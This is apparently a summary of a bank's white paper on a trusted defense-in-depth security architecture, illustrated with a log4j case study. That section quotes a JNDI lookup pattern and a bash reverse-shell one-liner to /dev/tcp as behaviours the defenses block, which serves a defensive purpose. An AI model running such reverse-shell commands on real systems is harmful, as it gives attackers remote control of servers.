可信纵深防御体系是一种新的安全防御体系架构,以密码学为基础、可信芯片为信任根、可信软件基为核心,对面向互联网开放的应用服务,确保应用运行所依赖的资源、行为在启动时和运行中均是可信的。有别于传统基于攻击方法被动优化拦截和阻断策略的思路,可信纵深防御系统在面对 0Day、社会工程学、软硬件供应链等难以预测的高等级未知威胁时具有显著优势。一方面,其通过白名单化的管控策略,根据业务的代码、流量数据,清晰定义系统运行所依赖的预期内的可信行为,使得意外行为无法发生;另一方面,其可以针对硬件、固件、系统和应用等不同的防御平面部署多层次的防御体系,加大防御纵深,使攻击者无法达成攻击目的或在达成攻击目的之前就被发现和制止。
中国工程院院士沈昌祥认为,主动免疫可信计算的保障体系是合法合规应对数字银行面临的高级和未知威胁的最有效解决方案。网商银行可信纵深防御体系是数字银行场景下对主动免疫可信计算体系很好的落地实践,能够为金融业及其它行业主动免疫可信计算防御的有效应用带来借鉴及示范。
以下是白皮书核心内容摘要:
1.数字化转型过程中,银行面临的安全挑战
图1 银行业数字化转型面临的安全挑战
《白皮书》指出,数字化转型是当下金融行业的主要趋势和发展方向。在银行业,数字化转型意味着:金融服务线上化、服务场景与形态多样化、开放互通幅度加大、数据密集度增加、效率与体验得到升级。然而不可忽视的是,数字化在带来效率显著提升的同时,也必然带来信息安全方面的挑战,主要包含以下三个方面:
a) 风险敞口与影响面扩大,安全事件概率增加。金融服务线上化、场景化、复杂化导致银行信息系统对外暴露的攻击面必然大幅度增加,将会有越来越多的漏洞被黑客发现和利用,攻击成功的概率也将会提升
b) 安全威胁等级将会提升。由于金融业务和资金有关,越来越多的金融服务数字化以后,攻击成功的潜在收益会增加。攻击者也更愿意投入更大的攻击成本,所以数字化转型中面临的安全威胁等级提高。
c) 安全与效率的矛盾将会更加突出。数字化转型带来了金融机构服务形态和技术形态的变化,原本依靠网络隔离技术和管理制度约束的机制不一定能继续适应,很可能无法满足业务发展的效率诉求和服务体验需求。因此,如何在应对高等级安全威胁的同时还能兼顾效率和服务体验,也是金融业务数字化转型中一个不可忽视的挑战。
图 2 数字化银行未来面临的关键安全威胁
《白皮书》指出系统性来看,在数字化转型过程中,银行业主要面临 0Day 漏洞攻击、社会工程学攻击、供应链安全威胁、业务滥用攻击四个方面的高等级安全威胁。
图 3 业界新思路分析
安全业界提出了一些新的思路与探索,包括可信计算、安全平行切面以及零信任。a) 首先是沈昌祥院士提出的可信计算 3.0 的理念。通过主动免疫的方法防御不可预测、不可控的攻击与威胁,并且基于不可篡改的硬件芯片作为可信根主动逐层检查系统的行为是否可信,建立理论可证完备的信任链。
b) 二是安全平行切面技术。在业务系统中构建安全防御的平行空间,实现与业务解耦、透视、智能评估、精准管控,兼顾业务效率的同时,高效构建安全纵深防御体系。
c) 三是零信任防御理念。从不信任,始终验证;不信任网络位置;最小化访问权限;记录和监控所有网络访问流量。
2.可信纵深防御技术体系
图 4 可信纵深防御理念
可信纵深防御,是一种新的安全防御体系架构。通过可信和纵深两个理念的结合,实现对风险的主动免疫,多层覆盖、完备信任,能够有效应对数字化营运中面临的各种风险,为业务发展保驾护航。可信纵深防御,可以做到只允许预期内的行为可以执行,即主动免疫。并且,通过将可信防御通过多层部署,形成纵深,大幅降低风险事件发生的概率。
与此同时,它建立了完备的信任链,将信任关系逐级规约至硬件芯片可信根,保障防御体系自身的安全。可信纵深防御,能有效识别“自己”和“非己”成分,破坏与排斥进入信息系统机体的有害“行为”,为信息系统加持“免疫能力”,有效应对 0Day 攻击、社会工程学攻击、供应链攻击等高级和未知威胁。
图 5 可信纵深防御总体框架
可信纵深防御体系整体架构有四个核心部分:硬件芯片可信根、可信策略控制点、信任链和可信管控中心。这四部分的安全防护部件形成可信防护体系,这一体系与计算体系形成双体系结构。其中可信管控中心又由可信策略管控系统、可信策略刻画系统、安全保障系统、稳定性保障系统四部分组成。
1) 基于硬件可信芯片构建信任根
基于硬件可信芯片和密码学方法对物理机的启动参数和启动程序进行可信管控,同时提供静态的和动态的信任链的校验机制,确保硬件芯片、启动参数、系统 OS 等均是安全可信的。同时基于硬件可信芯片构建信任链以将信任关系从基础设施层逐层传递至应用层和网络层,最终形成完备的信任链,以支持对数字银行信息系统和数字资产的可信管控和管控。
2) 基于安全切面构建可信策略控制点
基于数字银行 IT 架构分析、选型或者设计可信策略控制点,实现对于风险场景的数据内视和可信管控。在可信策略控制点的部署上,充分利用安全平行切面提供的原生安全控制点能力,以实现安全管控与业务应用的既融合又解耦,即安全能够深入业务逻辑,不再是外挂式安全;业务上线即带有默认安全能力,并实现跨维的检测、响应与防护;同时安全能力可编程、可扩展,与业务各自独立演进。
数字银行可信纵深防御体系架构如图 5 所示,针对开放的应用系统服务,在访问链路上,通过在移动端及终端层、网络层、应用层及基础设施层建立不同层面的可信策略控制点,并配置符合可信防御强度要求的安全防御策略。
在移动端及终端层,以移动端安全切面或 SDK 及终端检测与响应 EDR 能力作为可信策略控制点,针对用户的日常操作行为及员工的办公行为,对使用的小程序、软件、进程、网络等建立精细化的可信管控能力,做到仅允许预期内的小程序、软件、进程、网络行为是可以加载和执行的,以有效抵御恶意软件的加载和运行及木马、病毒的回连等行为。
在网络层,以统一访问代理网关流量切面为可信策略控制点,建立针对访问主体身份、权限、环境、行为的可信管控策略,确保访问主体仅能通过预期内的身份、权限,在安全的环境下,按照预期内的行为进行应用系统的使用,异常的身份冒用、越权操作、不可信的环境及网络攻击行为将直接被拦截或者上报安全事件。
应用层,以应用切面(含RASP)及安全容器系统切面为可信策略控制点,对容器、应用调用的类、方法、函数、文件和网络行为建立白名单的可信管控策略,确保容器和应用仅能按照预期内的方式启动或运行。
在基础设施层,基于硬件可信芯片信任根,对物理机节点的启动和运行进行可信管控,确保使用的物理机是可信的。如上所述,通过各个层面建立的可信策略控制点,配置可信管控策略,建立覆盖数字银行信息系统和数据资产全链路的可信纵深防御体系,有效应对数字银行面临的高级和未知威胁。
3) 基于信任链保障可信防御产品或能力的安全可信
可信策略控制点是数字银行实施可信管控依赖的关键能力,如何保障可信策略控制点的安全性至关重要。如果实施可信管控依赖的能力自身是不安全的,对于业务信息系统的可信管控将无法保障,同时这些能力本身也可能会引入新的安全风险。因此,在可信策略控制点的建设中需要充分利用硬件可信芯片提供的可信存储和密码技术,构建完备的信任链,将整个信任机制由硬件可信芯片逐层传递至基础设施层、应用层和网络层等各个层面的可信策略控制点,保障可信策略控制点的安全性,为数字银行业务的信息系统和数字资产的可信管控提供基础能力支撑。
4) 基于可信管控中心实施可信管控
可信管控中心是可信纵深防御体系的大脑中枢,负责可信策略的生成、配置下发、事件上报和行为审计等工作,同时为整个可信纵深防御体系的运行提供安全性和稳定性的保障能力。可信管控中心由可信策略管控、可信策略刻画、安全保障、稳定性保障等系统或模块组成。
综上所述,可信纵深防御体系整体架构以硬件可信芯片为信任根,以可信策略控制点为可信软件基,基于基础设施层、应用层、网络层及移动端和终端层各层面建立的可信策略控制点,进行多层纵深可信防护策略的设计并落地,覆盖业务应用、信息系统和服务全链路,形成完备的可信纵深防御体系,有效应对数字银行面临的高级和未知威胁。
3.可信纵深防御的应用及技术演进
图 6 log4j 风险案例分析
《白皮书》以 log4j 0Day 漏洞应对为例介绍了可信纵深防御体系的应用:2021 年 11 月爆发的 log4j 0Day 漏洞,几乎影响全球所有企业。实际上这个漏洞是 2013 年 9 月就存在了,意味着黑客可能在 8 年前就能利用此漏洞进行攻击,而直到 2021 年这个漏洞才公开和修复。而公开之前,这个漏洞到底造成了多少损失,则无法估计。
图 7 log4j 漏洞攻击链路
攻击链路分析:以 log4j 漏洞的利用和防护为例:首先,攻击者会通过使用通过精心构造的攻击脚本针对数字银行开放至互联网的漏洞应用发起恶意攻击请求。然后,攻击脚本到达应用层,应用代码调用 lookups 日志函数进行日志打印,触发漏洞利用点,恶意脚本通过该功能点可以执行系统命令。接下来,通过获取的应用权限进一步在应用容器当中反弹后门回连至攻击者远控服务器,达到长期控制应用及服务器的目的。最终,通过获取的后门权限窃取数字银行数据资产。
防护方案说明:
以如上 log4j 的漏洞利用链路为例介绍可信纵深防御体系对于该漏洞的关键应对方案。首先,当攻击者发起攻击的时候建立的网络层的可信能力会对请求的参数进行校验,如果参数仅包含 0-9a-zA-Z 之间的字符,则在网络层针对存在特殊字符的请求将会默认拦截。然后,如果请求到达了应用层,针对应用运行时可以加载的类、函数、方法、网络、文件等行为均会进行严格的白名单控制,针对 {jdni:rmi|ldap|…} 等服务将无法调用成功。进一步,请求到达了容器层,容器应用可信的能力将会严格限制容器当中的进程行为,非预期内 bash -i >& /dev/tcp/ip/port 0>&1 的反弹 shell 的行为将无法执行成功。最终在网络层,对于无外联需求的应用,将无法出网;对于有外联需求的应用也严格限制了外联的域名和参数等,从而有效地控制了攻击者外联远控服务器。通过构建多层可信级的防御措施最终达成了 0Day 漏洞防御的效果。
4.结语
随着数字经济的不断发展,数字银行的信息安全防护体系的价值愈加重要,而基础安全防御体系是保障银行业客户信息和资金安全的基础底座,也是保证银行持续稳健经营的安全基石。作为一家完全线上化运营的原生数字银行,网商银行对于可信纵深防御体系的探索,为未来信息安全防护体系的演进方向提供了一个范例。
编制工作组希望通过白皮书的方式将网商银行可信纵深防御的最佳实践共享给金融同业,为已经开展数字化转型或准备转型的同业机构,提供网络安全体系建设升级的参考案例。后续网商银行还会持续将可信纵深防御体系的成果与实践分享给整个银行业,和整个业界一同构建更完善的可信纵深防御生态,保障银行业数字化转型的安全平稳进行。
